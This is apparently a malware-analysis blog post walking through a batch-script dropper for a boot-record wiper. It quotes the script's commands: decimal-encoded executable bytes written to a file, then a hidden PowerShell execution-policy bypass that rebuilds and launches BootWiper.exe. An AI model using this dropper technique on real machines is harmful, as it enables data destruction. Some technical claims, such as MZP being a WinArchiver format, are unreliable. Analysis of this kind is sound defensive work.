Analysis Malicious Batch Script

 

Batch scripts, like PowerShell, can be used for malicious purposes, whether to download the second stage of the malware or to delete the entire system. In this article we will discuss how to analyze a malicious script that executes an executable file. Without using any external mechanisms, ie downloading from the cloud to the computer, but inside the executable file is converted decimal and when running the script starts to decode itself and then run. As a general explanation, running malware through any dropper script requires administrator permission.

Sample : https://bazaar.abuse.ch/sample/6501a5b432c8ff0d740520ef039d89b3ba6bcd3d991ff48fdf240f509d1e471e/

Note : The suffixes .cmd , .bat , and . batch still falls into the batch script class and template.

Malicious Codes [ Code Analysis ] :

@echo off

title Batch MBR Overwrite

color 4f

echo Run MBR Wiper? (make sure you run it as Administrator)

pause

echo|set /p=>456.hex

If we look at an important code in the script, it is : |set /p=>456.hex . Here the developer of this malicious script has created an empty file called 456.hex with the suffix we can make sure that the code that contains the executable file is encoded in Decimal.

And then comes the next code which is :

echo|set /p=77 90 80 0 2 0 0 0 4 0 15 0 255 255 0 0 184 0 0 0 0 0 0 64 0 26 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 186 16 0 14 31 180 9 205 33 184 1 76 205 33 144 144 84 104 105 115 32 112 114 111 103 114 97 109 32 109 117 115 116 32 98 101 32 114 117 110 32 117 110 100 101 114 32 87 105 110 51 50 13 10 36 55 0 0 0 0 0 0 0 0 >>456.hex

Here we understand that these decimal codes pipe in new the empty file it originally created called 456.hex .

To make sure that this is really an executable file. Through Cyber Chef we can make sure . As shown in the picture below. I have copied the decimal code that the developer of this malicious program piped into 456.hex. :

In the figure, we see that we have decoded the decimal and the first thing we see is a header called MZP. In fact, MZP is a file format It is the native format for WinArchiver. It also contains an executable file that the developer of the malicious program may have developed or downloaded from elsewhere and used for this process. And what further assures us that it contains an Executable file is This program must be run under Win32 . If you pay attention and have previous experience, most of the executable file programs, especially for Windows designed and created in the hex editor will see a string that says this program can not be run in DOS mode. This serves as a signature to identify the program as an executable file.  At the end of the malicious batch script code, we see that the developer of this malware relies on PowerShell to run the executable file encoded in decimal.

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -Command "[string]$hex = get-content -path 456.hex;[Byte[]] $temp = $hex -split '". ';[System.IO.File]::WriteAllBytes('BootWiper.exe', $temp)"

start BootWiper.exe

Here the developer of this script and malicious program performs several tasks and processes such as:

1. Bypass ExecutionPolicy

2- -Command "[string]$hex = get-content -path 456.hex

3- [System.IO.File]::WriteAllBytes

4. Start BootWiper.exe

What is important for us to focus on is not start BootWiper.exe, but [System.IO.File]::WriteAllBytes because here all the bytes and values in the executable file that was encoded in decimal places in a file called BootWiper.exe and then start running The system on the computer will black out. Either Modify the boot and ask for a fee in exchange for opening your computer, or no amount of money and only after a few hours or minutes to completely delete the system, in which case the infected person must reinstall the system from the beginning.